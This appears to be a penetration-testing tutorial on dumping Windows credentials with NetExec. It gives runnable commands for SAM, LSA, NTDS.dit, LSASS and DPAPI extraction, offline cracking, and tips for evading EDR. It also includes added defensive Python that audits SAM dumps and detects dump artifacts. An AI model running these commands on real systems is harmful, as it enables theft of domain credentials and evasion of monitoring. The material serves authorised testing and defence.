Credential Dumping with NetExec

#Overview

Credential dumping is the extraction of password hashes, cached credentials, and authentication material from Windows systems. NetExec provides multiple dumping methods — from lightweight SAM extraction to full NTDS.dit domain database exfiltration. Each method has different privilege requirements, noise levels, and output formats.

#Prerequisites

  • Administrative privileges on target (local admin for SAM/LSA, Domain Admin for NTDS)
  • Network access to SMB (445/TCP)
  • Understanding of hash formats and offline cracking tools

#SAM Dump (Local Account Hashes)

Extracts local user account hashes from the Security Account Manager (SAM) registry hive.

```bash
# Dump SAM via SMB (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass --sam
#   Output format: username:RID:LM_hash:NT_hash:::

# Dump SAM with pass-the-hash
netexec smb 10.10.10.5 -u administrator -H ':NTHASH' --sam

# Dump SAM across multiple hosts
netexec smb targets.txt -u administrator -p pass --sam --continue-on-success
```

Output interpretation:

```text
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::
#   username   :RID : LM_hash                          : NT_hash                          :::
```
  • aad3b435b51404eeaad3b435b51404ee as LM hash = LM disabled or blank (normal on modern Windows)
  • 31d6cfe0d16ae931b73c59d7e0c089c0 as NT hash = empty password
  • Guest account RID = 501, Administrator RID = 500
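As an added example (not part of the original page or of NetExec), the following Python parses hash lines in the username:RID:LM_hash:NT_hash::: format shown above, flags the conditions the bullets describe (empty NT hash, LM hash present, built-in RIDs 500 and 501) and, for the hash-reuse check mentioned under Post-Exploitation Value, reports NT hashes shared by accounts on more than one host. The sample dumps are constructed: the Administrator line is the page's own example, the other hashes are the well-known empty-password constants and the standard test-vector hashes for the password "password".

```python
"""Audit a NetExec/secretsdump-style SAM dump (added example, not NetExec code).

Line format, as described on this page:  username:RID:LM_hash:NT_hash:::
The SAMPLE_DUMPS below are constructed for illustration.
"""
from __future__ import annotations
from dataclasses import dataclass

# Well-known values from the page
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM disabled or blank password
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}


@dataclass
class SamEntry:
    username: str
    rid: int
    lm_hash: str
    nt_hash: str

    def findings(self) -> list[str]:
        """Conditions a reviewer should notice for this account."""
        out = []
        if self.nt_hash == NT_EMPTY:
            out.append("empty password")
        if self.lm_hash != LM_EMPTY:
            out.append("LM hash present (LM hashing still enabled)")
        if self.rid in WELL_KNOWN_RIDS:
            out.append(WELL_KNOWN_RIDS[self.rid])
        return out


def parse_sam_line(line: str) -> SamEntry | None:
    """Parse one 'user:rid:lm:nt:::' line; None for comments, blanks or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(":")
    if len(parts) < 4:
        return None
    username, rid, lm_hash, nt_hash = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit():
        return None
    for h in (lm_hash, nt_hash):
        if len(h) != 32 or any(c not in "0123456789abcdef" for c in h):
            return None
    return SamEntry(username, int(rid), lm_hash, nt_hash)


def audit_dump(text: str) -> dict[str, list[str]]:
    """Map each username in one dump to its findings (empty list = nothing notable)."""
    report: dict[str, list[str]] = {}
    for line in text.splitlines():
        entry = parse_sam_line(line)
        if entry is not None:
            report[entry.username] = entry.findings()
    return report


def find_hash_reuse(dumps: dict[str, str]) -> dict[str, list[str]]:
    """Across several hosts' dumps, return NT hashes used by more than one account.

    Equal NT hashes mean equal passwords, so a local Administrator hash that
    appears on many hosts is exactly the reuse this page says to check for.
    """
    users_by_hash: dict[str, list[str]] = {}
    for host, text in dumps.items():
        for line in text.splitlines():
            entry = parse_sam_line(line)
            if entry is None or entry.nt_hash == NT_EMPTY:
                continue
            users_by_hash.setdefault(entry.nt_hash, []).append(f"{host}\\{entry.username}")
    return {h: sorted(u) for h, u in users_by_hash.items() if len(u) > 1}


# Constructed sample dumps (see the lead-in for where the hash values come from)
SAMPLE_DUMPS = {
    "WS01": (
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::\n"
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
        "svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\n"
    ),
    "WS02": (
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::\n"
        "helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::\n"
    ),
}

if __name__ == "__main__":
    for host, text in SAMPLE_DUMPS.items():
        for user, notes in audit_dump(text).items():
            print(f"{host}\\{user}: {', '.join(notes) or 'ok'}")
    for nt_hash, users in find_hash_reuse(SAMPLE_DUMPS).items():
        print(f"NT hash {nt_hash} shared by: {', '.join(users)}")
```

Feed it the saved output of a SAM dump per host (one text blob per hostname) and the reuse map tells you which accounts share a password without anyone having to crack anything; the parser tolerates NetExec's own comment and status lines because it only accepts lines with a numeric RID and two 32-hex-digit hashes.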

#LSA Dump (Cached Credentials and Secrets)

Extracts LSA secrets including cached domain credentials, service account passwords, and DPAPI keys.

```bash
# Dump LSA secrets (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass --lsa
#   Output: cached domain logon credentials (DCC2 hash format)
#           service account passwords in plaintext
#           DPAPI system keys

# Dump LSA with pass-the-hash
netexec smb 10.10.10.5 -u administrator -H ':NTHASH' --lsa
```

What LSA secrets contain:

  • NL$KM — DPAPI decryption key (unlocks browser passwords, scheduled task credentials)
  • DefaultPassword — auto-logon password (if configured)
  • Cached domain credentials — MSCACHEv2 hashes of recent domain logons
  • Service account passwords — plaintext passwords for services running as domain accounts

#NTDS.dit Dump (Full Domain Database)

Extracts the entire Active Directory database — every user hash, group membership, and trust relationship.

```bash
# Dump NTDS via SMB (requires Domain Admin or equivalent)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
#   Requires: Replicating Directory Changes permission (Domain Admin by default)
#   Output: every domain user's NTLM hash, Kerberos keys, group memberships

# Dump NTDS with pass-the-hash
netexec smb 10.10.10.5 -u domain_admin -H ':NTHASH' --ntds
```

Post-dump processing:

```bash
# Extract hashes from NTDS.dit for offline cracking
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
#   Output: all domain user hashes in hashcat-compatible format
```

#lsassy Module (Remote LSASS Dump)

Remotely dumps the LSASS process memory and extracts credentials — without writing files to disk on the target.

```bash
# Dump LSASS via lsassy module (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass -M lsassy
#   Method: uses comsvcs.dll to create a minidump of LSASS
#   Output: credentials extracted from LSASS memory (saved to workspace)

# Specify dump method
netexec smb 10.10.10.5 -u administrator -p pass -M lsassy -o METHOD=2
#   Method 0: comsvcs.dll (default, most reliable)
#   Method 1: procdump.exe (requires upload)
#   Method 2: dumpert (direct syscall, bypasses some EDR)
#   Method 3: nanodump (PowerShell-based)

# Dump across multiple hosts
netexec smb targets.txt -u administrator -p pass -M lsassy --continue-on-success
```

Output location:

```text
~/.netexec/workspaces/<workspace>/lsassy/
#   Contains: extracted credentials in multiple formats
```

#DPAPI Dump (Data Protection API Keys)

Extracts DPAPI master keys used to decrypt protected data (browser passwords, scheduled task credentials, certificate private keys).

```bash
# Dump DPAPI master keys (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass --dpapi
#   Output: DPAPI master keys and domain backup keys

# Use DPAPI keys to decrypt browser passwords
# (Requires additional tools: dpapi.py or Mimikatz)
```

#Combining Dumps for Maximum Coverage

```bash
# Full credential harvesting workflow
# Step 1: SAM (local accounts)
netexec smb 10.10.10.5 -u admin -p pass --sam > sam_hashes.txt

# Step 2: LSA (cached domain + service accounts)
netexec smb 10.10.10.5 -u admin -p pass --lsa > lsa_secrets.txt

# Step 3: LSASS (active sessions + plaintext passwords)
netexec smb 10.10.10.5 -u admin -p pass -M lsassy

# Step 4: DPAPI (for decrypting stored credentials)
netexec smb 10.10.10.5 -u admin -p pass --dpapi

# Step 5 (if Domain Admin): NTDS (entire domain)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
```

#Offline Cracking Integration

#Hashcat

```bash
# NTLM hashes (mode 1000)
hashcat -m 1000 sam_hashes.txt /usr/share/wordlists/rockyou.txt --force

# NetNTLMv2 (mode 5600) - from Responder captures
hashcat -m 5600 netntlm_hashes.txt /usr/share/wordlists/rockyou.txt --force

# Kerberos TGS (mode 13100) - from Kerberoasting
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force

# Kerberos AS-REP (mode 18200) - from AS-REP roasting
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force

# MSCACHEv2 / DCC2 (mode 2100) - from LSA cached credentials
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt --force

# DPAPI master key (mode 15300) - from DPAPI dump
hashcat -m 15300 dpapi_masterkey.txt /usr/share/wordlists/rockyou.txt --force
```

#John the Ripper

```bash
# NTLM
john sam_hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

# Kerberos TGS
john kerberoast.txt --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt

# MSCACHEv2
john cached_hashes.txt --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt
```

#Common Pitfalls

  • ⚠️ SAM requires admin: SAM dump fails without local admin. Check for (Pwn3d!) indicator first.
  • ⚠️ NTDS requires Domain Admin: Or equivalent (Replicating Directory Changes + Replicating Directory Changes All permissions). Enterprise Admin also works.
  • ⚠️ lsassy blocked by EDR: Most EDR products hook LSASS access. Try different methods (0–3) or use alternative tools (Mimikatz with custom injection).
  • ⚠️ DPAPI needs domain backup key: For domain-encrypted DPAPI blobs, you need the domain DPAPI backup key (from NTDS or LSA dump on a DC).
  • ⚠️ Empty LM hash is normal: aad3b435b51404eeaad3b435b51404ee means LM is disabled (default since Vista/Server 2008). Don't waste time cracking it.
  • ⚠️ MSCACHEv2 is slow to crack: Unlike NTLM (fast), MSCACHEv2 uses PBKDF2 with 10240 iterations. Hashcat rate is ~1/100th of NTLM speed.

#OPSEC Considerations

| Method | Noise Level | Key Artifacts | EDR Detection |
| --- | --- | --- | --- |
| SAM dump | High | Service creation (7045), registry read, temp files | Medium |
| LSA dump | High | Service creation, registry read, temp files | Medium |
| NTDS dump | Very High | Massive SMB traffic, volume shadow copy (if used) | High |
| lsassy (Method 0) | High | LSASS process access, minidump creation | Very High |
| lsassy (Method 2) | Medium | Direct syscalls, bypasses userland hooks | Medium |
| lsassy (Method 3) | Medium | PowerShell process, ScriptBlock logging | Medium |
| DPAPI dump | Medium | Registry read, file access | Low |
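As an added example from the defender's side (not part of the original page or of NetExec), the following Python turns three of the artifacts in the table into detection rules and runs them over a handful of constructed events: a System log 7045 service installation whose image path is a shell or a temp-directory binary, a Sysmon event 10 handle to lsass.exe with memory-read rights from a process outside an assumed allow list, and a Sysmon event 1 command line invoking comsvcs.dll MiniDump (the lsassy default method). Field names follow the Windows System log and Sysmon schemas; the allow-listed AV path, the host names and every sample event are assumptions. It also correlates hits per host, since the table shows that a single dump leaves several artifacts at once.

```python
"""Detection rules for artifacts in the OPSEC table (added example, not NetExec code).

Events are flattened dicts using the field names of Windows System log 7045 and
Sysmon events 1 (ProcessCreate) and 10 (ProcessAccess). SAMPLE_EVENTS are constructed.
"""
from __future__ import annotations
import re

PROCESS_VM_READ = 0x0010  # access bit needed to read LSASS memory (a minidump needs it)

# Processes allowed to open LSASS with read rights on this (assumed) estate.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",  # assumed allow-listed AV path
}

# Service binaries that are a command shell or live under a temp directory.
SHELL_OR_TEMP = re.compile(r"%comspec%|cmd\.exe|powershell|\\temp\\", re.IGNORECASE)


def rule_service_creation(ev: dict) -> str | None:
    """System 7045: new service whose ImagePath is a shell or a temp-directory binary."""
    if ev.get("source") != "System" or ev.get("EventID") != 7045:
        return None
    path = ev.get("ImagePath", "")
    if SHELL_OR_TEMP.search(path):
        return f"service {ev.get('ServiceName')!r} installed with image path {path!r}"
    return None


def rule_lsass_access(ev: dict) -> str | None:
    """Sysmon 10: a non-allow-listed process opened lsass.exe with PROCESS_VM_READ."""
    if ev.get("source") != "Sysmon" or ev.get("EventID") != 10:
        return None
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    try:
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
    except ValueError:
        return None
    src = ev.get("SourceImage", "").lower()
    if granted & PROCESS_VM_READ and src not in LSASS_ACCESS_ALLOWLIST:
        return f"{src} opened lsass.exe with GrantedAccess {granted:#x}"
    return None


def rule_comsvcs_minidump(ev: dict) -> str | None:
    """Sysmon 1: comsvcs.dll MiniDump on a command line (lsassy's default method)."""
    if ev.get("source") != "Sysmon" or ev.get("EventID") != 1:
        return None
    cmd = ev.get("CommandLine", "").lower()
    if "comsvcs.dll" in cmd and "minidump" in cmd:
        return f"comsvcs MiniDump invoked: {ev.get('CommandLine')!r}"
    return None


RULES = (rule_service_creation, rule_lsass_access, rule_comsvcs_minidump)


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (host, rule name, detail) for every event that matches a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append((ev.get("host", "?"), rule.__name__, detail))
    return hits


def hosts_with_dump_pattern(events: list[dict], min_rules: int = 2) -> list[str]:
    """Hosts on which at least `min_rules` distinct rules fired: several of the
    table's artifacts on one host is a stronger signal than any single event."""
    fired: dict[str, set[str]] = {}
    for host, rule, _ in detect(events):
        fired.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in fired.items() if len(rules) >= min_rules)


SAMPLE_EVENTS = [
    # WS01: the artifact chain of a remote LSASS dump (constructed)
    {"host": "WS01", "source": "System", "EventID": 7045, "ServiceName": "svc-CONSTRUCTED",
     "ImagePath": r"%COMSPEC% /Q /c C:\Windows\Temp\CONSTRUCTED.bat"},
    {"host": "WS01", "source": "Sysmon", "EventID": 1,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Windows\Temp\CONSTRUCTED.dmp full"},
    {"host": "WS01", "source": "Sysmon", "EventID": 10,
     "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    # FS02: benign noise that must not fire (constructed)
    {"host": "FS02", "source": "System", "EventID": 7045, "ServiceName": "VendorAgent",
     "ImagePath": r"C:\Program Files\Vendor\agent.exe"},
    {"host": "FS02", "source": "Sysmon", "EventID": 10,
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"host": "FS02", "source": "Sysmon", "EventID": 10,
     "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for host, rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{host}] {rule}: {detail}")
    print("hosts with correlated dump artifacts:", hosts_with_dump_pattern(SAMPLE_EVENTS))
```

The LSASS rule keys on the PROCESS_VM_READ bit rather than on one exact GrantedAccess value, so a handle requesting 0x1010, 0x1410 or full access all match while a query-only 0x1000 handle does not; the allow list is what keeps the AV engine quiet, and it should be as short as your estate allows.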

#Post-Exploitation Value

  • SAM hashes → local admin on this host, check for hash reuse across network
  • LSA secrets → cached domain credentials, service account plaintext passwords
  • NTDS.dit → complete domain compromise evidence, every user hash
  • lsassy output → active session credentials, plaintext passwords in memory
  • DPAPI keys → browser passwords, RDP saved credentials, scheduled task credentials
